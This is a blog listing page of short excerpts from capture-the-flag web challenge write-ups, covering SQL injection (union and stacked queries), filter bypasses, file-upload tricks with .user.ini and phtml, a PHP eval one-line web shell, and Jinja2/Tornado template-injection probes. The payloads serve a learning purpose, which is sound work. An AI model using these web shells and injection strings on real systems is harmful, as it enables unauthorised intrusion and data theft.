上一页 1 ··· 9 10 11 12 13 14 15 下一页
摘要: check.php?username=admin'&password=1 使用#闭合后通过 #order by查列数 admin' order by 4# #查回显位 -1' union select 1,2,3# #查库 得到库名'geek' -1' union select 1,2,databa 阅读全文
posted @ 2020-05-11 18:27 山野村夫z1 阅读(500) 评论(0) 推荐(0) 编辑
摘要: 本题过滤了or from by where ,用双写绕过即可 flag在b4bsql表里 阅读全文
posted @ 2020-05-11 18:26 山野村夫z1 阅读(246) 评论(0) 推荐(0) 编辑
摘要: 知识点 php别名绕过 随意上传一个aa.jpg文件,抓包,修改后缀名,写马 后缀名一直尝试到phtml后上传成功 使用蚁剑连接 双击进入后台 在根目录下找到flag 阅读全文
posted @ 2020-05-11 18:24 山野村夫z1 阅读(497) 评论(0) 推荐(0) 编辑
摘要: 知识点 文件上传 .user.ini 利用.user.ini进行文件上传,参考自从SUCTF 2019 CheckIn 浅谈.user.ini的利用 上传这样的一个ini文件 GIF89a auto_prepend_file=a.jpg 再上传一个a.jpg文件 GIF89a <script lan 阅读全文
posted @ 2020-05-11 18:23 山野村夫z1 阅读(389) 评论(0) 推荐(0) 编辑
摘要: 知识点 js绕过 GIF89a文件头 编写一句话木马上传 <?php @eval($_POST[cmd]); ?> 发现php被过滤 使用js脚本绕过 <script language = 'php'>@eval($_POST[cmd]);</script> 发现需要图片 使用文件头绕过 更改后缀名 阅读全文
posted @ 2020-05-11 18:21 山野村夫z1 阅读(206) 评论(0) 推荐(0) 编辑
摘要: 知识点 SSTI Jinja2 随便输入一点东西 查看源码 提示ssti注入 图片来自Flask/Jinja2 SSTI 学习 尝试{{7*'7'}}回显 7777777,可知为jinja2模板 以下参考 [BJDCTF 2nd]fake google SSTI模板注入 __class__ 返回类型 阅读全文
posted @ 2020-05-11 18:18 山野村夫z1 阅读(352) 评论(1) 推荐(0) 编辑
摘要: 知识点 Jinja2 url_for 参考 https://www.cnblogs.com/Cl0ud/p/12316287.html https://www.cnblogs.com/wangtanzhi/p/12238779.html 阅读全文
posted @ 2020-05-11 18:17 山野村夫z1 阅读(203) 评论(0) 推荐(0) 编辑
摘要: 知识点 ssti handler.settings 题目如图所示 依次点开得到 同时在URL中可以看到 file?filename=/hints.txt&filehash=8590dfced9b10ac7d05a1c291e590312 说明要读取/fllllllllllllag,还需要相关的has 阅读全文
posted @ 2020-05-11 18:13 山野村夫z1 阅读(543) 评论(0) 推荐(0) 编辑
摘要: 知识点 堆叠注入 sql_mode 打开题目,如图 堆叠注入 查库 1;show databases; 查表 1;show tables; 查Flag 1;show columns from Flag; wp给的payload payload:1;set sql_mode=PIPES_AS_CONC 阅读全文
posted @ 2020-05-11 18:10 山野村夫z1 阅读(292) 评论(0) 推荐(0) 编辑
摘要: 知识点 堆叠注入 预编译 原理参考堆叠注入详解 打开题目,如图所示 尝试 -1' union select 1,2# 发现select被禁 尝试堆叠注入 查库 1';show databases;# 查表 1';show tables;# 查1919810931114514表的列名 1';show 阅读全文
posted @ 2020-05-11 18:07 山野村夫z1 阅读(272) 评论(0) 推荐(0) 编辑
上一页 1 ··· 9 10 11 12 13 14 15 下一页